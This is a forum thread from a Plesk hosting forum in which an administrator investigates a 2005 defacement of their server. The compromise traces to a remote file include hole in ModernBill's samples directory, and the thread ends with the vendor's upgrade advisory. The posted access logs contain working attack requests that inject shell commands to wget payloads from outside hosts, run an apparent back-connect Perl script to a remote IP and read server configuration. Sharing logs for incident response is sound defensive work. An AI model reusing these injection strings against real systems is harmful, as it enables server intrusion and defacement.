1. Please take a little time for this simple survey! Thank you for participating!
    Dismiss Notice

Hacked by Infection Group

Discussion in 'Plesk for Linux - 8.x and Older' started by ryanz, Apr 17, 2005.

  1. ryanz

    ryanz Basic Pleskian

    24
    73%
    Joined:
    Nov 23, 2002
    Messages:
    91
    Likes Received:
    0
    Hacked by Infection Group (Check your Modernbill Version)

    Hi,

    One of our servers was hacked by "Infection Group" and all index files were replaced by modified index.html files.

    So far I only found two executable files called l_all.exe and ram.exe in /tmp

    Does anyone have experience with this or know how they did it and what to check for?

    Any help would be appreciated.
     
  2. pdreissen

    pdreissen Guest

    0
     
  3. ryanz

    ryanz Basic Pleskian

    24
    73%
    Joined:
    Nov 23, 2002
    Messages:
    91
    Likes Received:
    0
    Thanks pdreissen,

    We have chkrootkit installed and it came up clean. I've now installed rkhunter and get the following warnings on a RH9 (Fully updated) Plesk 7.5.X:

    Application advisories
    * Application scan
    Checking Apache2 modules ... [ Not found ]
    Checking Apache configuration ... [ OK ]

    * Application version scan
    - GnuPG 1.2.1 [ Old or patched version ]
    - Apache 2.0.40 [ Old or patched version ]
    - Bind DNS [unknown] [ OK ]
    - OpenSSL 0.9.7a [ Old or patched version ]
    PHP Warning: Function registration failed - duplicate name - sg_load in Unknown on line 0
    PHP Warning: SourceGuardian: Unable to register functions, unable to load in Unknown on line 0
    - PHP 4.3.10 [ OK ]
    - Procmail MTA 3.22 [ OK ]
    - ProFTPd 1.2.10 [ OK ]
    - OpenSSH 3.9.0p1 [ OK ]

    ---------------------------- Scan results ----------------------------

    MD5
    MD5 compared: 51
    Incorrect MD5 checksums: 0

    File scan
    Scanned files: 342
    Possible infected files: 0

    Application scan
    Vulnerable applications: 3

    Scanning took 126 seconds

    -----------------------------------------------------------------------

    It seems all index.php, index.html, index.jsp, etc were replaced by an index file in /tmp

    Still looking through the logs...
     
  4. pdreissen

    pdreissen Guest

    0
     
    Seems that some of your apps or old and possible "unsafe" version.
    Please get those updated.

    Also check /var/spool/cron maybe there is an Apache cron entry...

    Remove it if you don't need what's inside it.

    Please read this thread for some good advice on howto secure your server:

    http://forum.plesk.com/showthread.php?s=&threadid=19876
     
  5. ryanz

    ryanz Basic Pleskian

    24
    73%
    Joined:
    Nov 23, 2002
    Messages:
    91
    Likes Received:
    0
    Look at these extracts from a domain logfile:

    "GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/tmp;wget%20http://doptik.i8.com/Bd/bd_daemon.jpg HTTP/1.1" 200 2575 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/tmp;wget%20geocities.com/deiz0r/dc.pl HTTP/1.1" 200 2556 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/tmp;perl%20dc.pl%20201.0.218.111%2021 HTTP/1.1" 200 2287 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=locate%20httpd.conf HTTP/1.1" 200 2585 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cat%20/etc/httpd/conf/httpd.conf%20|%20grep%20ServerName HTTP/1.1" 200 2350 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=/home/httpd/vhosts/;ls HTTP/1.1" 200 2247 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=/home/httpd/vhosts/CVS;ls HTTP/1.1" 200 2247 "
    T /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=/home/httpd/;ls HTTP/1.1" 200 2247 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cat%20/etc/httpd/conf/httpd.include%20|%20grep%20ServerName HTTP/1.1" 200 3164 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cat%20/etc/httpd/conf/httpd.include%20|%20grep%20DocumentRoot HTTP/1.1" 200 3349 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/home/httpd/vhosts/default;ls HTTP/1.1" 200 2205 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/home/httpd/vhosts/;ls HTTP/1.1" 200 4350 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=uname%20-a;id HTTP/1.1" 200 2340 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/home/httpd/vhosts;ls HTTP/1.1" 200 4350 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/home/httpd/vhosts/"domain-name"/httpdocs;ls HTTP/1.1" 200 3502 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/home/httpd/vhosts/"domain-name"/httpdocs;wget%20http://www.viavincitore.com.br/imagens/l_all.exe HTTP/1.1" 200 2556 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/tmp;wget%20http://www.viavincitore.com.br/imagens/l_all.exe HTTP/1.1" 200 3327 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/tmp;wget%20http://www.viavincitore.com.br/imagens/ram.exe HTTP/1.1" 200 3322 "
    GET /ram.exe HTTP/1.1" 403 562 "
    GET /l_all.exe HTTP/1.1" 200 497152 "
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=uname%20-a;id HTTP/1.1" 200 2340 "
    GET /modernbill/ram.exe HTTP/1.1" 403 562 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.5) Gecko/20041118 Firefox/1.0
    GET /favicon.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.5) Gecko/20041118 Firefox/1.0
    GET /modernbill/ram.exe HTTP/1.1" 403 562 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.5) Gecko/20041118 Firefox/1.0
    GET /modernbill/samples/news.php?DIR=http://www.derf.hpgvip.ig.com.br/newcmd.gif?&cmd=cd%20/home/httpd/vhosts/"domain-name"/httpdocs/modernbill/;cat%20ram.exe HTTP/1.1" 200 2212 "
    GET /l_all.exe HTTP/1.1" 200 497152 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.5) Gecko/20041118 Firefox/1.0

    Maybe this has some clues and can help some of the other users. The IP addresses were 200.232.233.235 and 201.0.218.111
     
  6. ryanz

    ryanz Basic Pleskian

    24
    73%
    Joined:
    Nov 23, 2002
    Messages:
    91
    Likes Received:
    0
    Look at this

    From Modernbill Support

    Version 4.3.1 Release - Security Update

    In keeping with our quarterly release policy, ModernGigabyte is proud to release our new version 4.3.1. Please note that this version release contains some important security upgrades. You will want to upgrade to this version as soon as practicable. Changes in PHP scripting methods make it necessary for us to make changes from time to time to reduce the possibility of cross-scripting and SQL injection attacks.

    If you are unable to upgrade, please ensure you have removed the "samples" directory from your ModernBill installation. The "samples" files are not intented for live usage and should only be used as an example of how to integrate some aspects of ModernBill into your existing web site.

    This will protect your ModernBill from the "Remote File Include Vulnerability" until you can upgrade to the latest release.
     
Loading...